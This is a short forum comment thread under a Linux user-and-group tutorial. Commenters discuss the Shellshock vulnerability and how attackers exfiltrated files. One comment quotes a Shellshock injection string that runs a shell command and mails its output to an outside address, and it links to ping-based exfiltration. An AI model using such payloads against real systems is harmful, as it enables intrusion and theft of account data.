You are viewing a single comment's thread from:

RE: Linux Tutorial - Understanding User and Group

in #utopian-io8 years ago

Yeah I saw some people mail themselves the content of these two files with either mail like this:
https://blog.cloudflare.com/inside-shellshock/
() { :;}; /bin/bash -c \"whoami | mail -s 'example.com l' [email protected] obviously the command had to be adapted a bit and you had to have a few things setup in a certain way for this to work. I also saw some more creative data exfiltration methods mentioned here: https://www.reddit.com/r/AskNetsec/comments/39a8my/how_to_exploit_shellshock_with_only_ping/ such as using ping :)
Thanks for interesting post. Will be following you. I'm gonna post this on reddit.com/r/linux_mentor.

Sort:  

There is always a way for those who are persistent in finding ways to penetrate a system. The shellshock case also shows how vulnerabilities can be exploited for negative things. Thanks for sharing full of information's link about Pentesting. Two thumbs up for you.

Coin Marketplace

STEEM 0.10
TRX 0.32
JST 0.033
BTC 112611.10
ETH 4125.14
USDT 1.00
SBD 0.67